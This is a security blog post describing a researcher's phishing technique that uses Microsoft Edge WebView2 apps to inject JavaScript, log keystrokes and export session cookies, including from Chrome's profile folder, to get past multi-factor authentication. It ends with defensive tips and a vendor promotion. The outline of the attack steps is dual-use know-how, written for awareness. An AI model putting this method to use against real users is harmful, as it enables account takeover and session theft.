A new clever phishing method bypasses MFA using Microsoft WebView2

Multi-factor authentication (MFA) is also supposed to protect against phishing attacks and is considered quite secure. After all, the attacker needs not only the username and password, but also the second factor, usually the user's smartphone. However, sneaky fraudsters have now found a way to circumvent this protection. This is made possible by Microsoft, of all people.

Criminals are using a new scam (new, clever phishing technique) that uses Microsoft Edge WebView2 applicaions to steal victim's authentication cookies, allowing threat actors to bypass multi-factor authentication (MFA) when logging into stolen accounts.

Today we have a large number of data breaches, remote access trojan attacks, and phishing campaigns - so stolen login credentials have become abundant. However, the increasing adoption of multi-factor authentication (MFA) has made it difficult to use these stolen credentials unless the threat actor also has access to the target's one-time MFA passcodes or security keys.

This has led to threat actors and researchers coming up with new ways of bypassing MFA, including zero-day website vulnerabilities, reverse proxies, and clever techniques, such as the Browser in the Browser attack and utilizing VNC to display remote browsers locally.

This week, cybersecurity researcher mr.d0x has created a new phishing method that uses Microsoft Edge WebView2 applications to easily steal a user's authentication cookies and log into stolen accounts, even if they are secured with MFA.

Microsoft Edge WebView2

This new social engineering attack is called WebView2-Cookie-Stealer and consists of a WebView2 executable that, when launched, opens up a legitimate website's login form inside the application.

What is WebView2?

Microsoft Edge WebView2 is a kind of browser module that is supposed to make it easier for app manufacturers. They do not need to integrate their own browser into the apps, because WebView2 allows them to embed a web browser, with full support for HTML, CSS, and JavaScript, directly in their own native apps using Microsoft Edge as the rendering engine.

This then works just like Microsoft Edge itself. Apps can load any website into a native application and have it appear as it would if you opened it in Microsoft Edge. So users actually visit the pages they want to log in to.

However, WebView2 also allows developers to directly access any cookies and inject JavaScript into the webpage that is loaded by an application. This makes it very easy to log keystrokes and steal authentication cookies and send to remote servers on the Internet. The fraudsters then only need to save the cookies in the right place, visit the desired page, and they have full access, as the site thinks it is the user who has already authenticated.

How does Microsoft react to this report?

Microsoft rightly pointed out that the user has to execute a malicious file first.

However, as experience shows, this is not a major obstacle for the criminals.

How does such an attack work?

As shown below, the login form renders exactly as it would when using a regular browser when sign in to a Microsoft Online Service and does not contain any suspicious elements like typos, strange domain names, etc.

WebView2 application can inject JavaScript into the page, so anything the user types is automatically sent back to the attacker's web server.

However, the real strength of this type of application is its ability to steal all cookies sent by the remote server after a user logs in, including authentication cookies.

To do this, the application creates a Chromium User Data folder the first time it runs and then uses that folder for each subsequent install.

The malicious application then uses the built-in WebView2 interface "ICoreWebView2CookieManager" to export the website's cookies upon successful authentication and sends them back to the attacker-controlled server, as shown below.

Once the attacker has decrypted the base64-encoded cookies, he has full access to the authentication cookies for the website and can use them to log in to a user account.

WebView2 can be used to steal all available cookies for the current user. This was successfully tested on Chrome," explains a report on this technique by mr.d0x.

WebView2 allows you to launch with an existing User Data Folder (UDF) rather than creating a new one. The UDF contains all passwords, sessions, bookmarks etc. Chrome’s UDF is located at C:\Users\\AppData\Local\Google\Chrome\User Data.

We can simply tell WebView2 to start the instance using this profile and upon launch extract all cookies and transfer them to the attacker's server.

Attacker could use these cookies to access the login form for a stolen account and import the cookies using a Chrome extension like "EditThisCookie". Once the cookies are imported, they simply refresh the page to automatically authenticate to the website.

More worryingly, this attack also bypasses MFA secured by OTPs or security keys, as the cookies are stolen after the user has logged in and successfully solved the multi-factor authentication challenge.

Let me explain shortly

Assuming the attacker sets up Github.com/login in his Webview2 app and the user logs in, the cookies can be extracted and transferred to the attacker's server.

Yubikeys can't save you because you are authenticating to the REAL website, not a phishing website.

Moreover, these cookies are valid until the session expires or another post-authentication check detects any unusual behavior.

So if there are no additional checks after authentication, it won't be detected, and of course that's not so easy to implement.

Social engineering is required to attack

However, this attack is a social engineering attack that requires a user to execute a malicious executable.

Microsoft explains This social engineering technique requires an attacker to convince a user to download and run a malicious application. We recommend users to practice safe computing habits, not to run or install applications from unknown or untrusted sources, and to always use and keep Microsoft Defender (or other anit-malware software) up-to-date.

Therefore, getting someone to launch an application in the first place can take additional effort.

However, history has shown us that many people "just run things" without thinking about the consequences, be it email attachments, random downloads from the Internet, cracks and warez, or game cheats.

All of these methods have been proven to work with relatively little effort and result in the installation of ransomware, remote access Trojans, password stealing Trojans, and much more.

Therefore, the researcher's WebView2 attack is feasible, especially if it looks like a legitimate application installer that requires you to log in first. For example, a fake Microsoft Office installer, game, or Zoom client.

While this attack has not yet been used in real-world attacks, the researcher's techniques have been used quickly in attacks in the past.

How to protect?

As for protecting against these attacks, the usual cybersecurity advice still applies.

• Use an up-to-date protection program (like Microsoft Defender)

• Do not open unknown attachments, especially if they are executable files

• Do not open files that you have not downloaded or requested yourself - even from trusted contacts

• Use only trusted sites to download programs

• Scan files you download from the Internet

• Open the corresponding pages yourself in the browser if you want to log in there

• Enter your credentials into an application only if you are 100% sure that the program is legitimate

• Be suspicious if you receive unsolicited emails with attachments

• Do not open links that you do not know where they lead

How secure is your environment?

How secure is your email and Microsoft 365 environment?

Do you know where security gaps exist and data can leak out?

At my employer (GARAIO AG), we have developed a Microsoft 365 Security & Compliance Assessment that identifies existing security gaps based on recommendations in a clear and detailed report.

We are happy to support you with our know-how in the implementation of identity, data and information protection based on Microsoft tools.

Reach out for more information - send me an email or write me on LinkedIn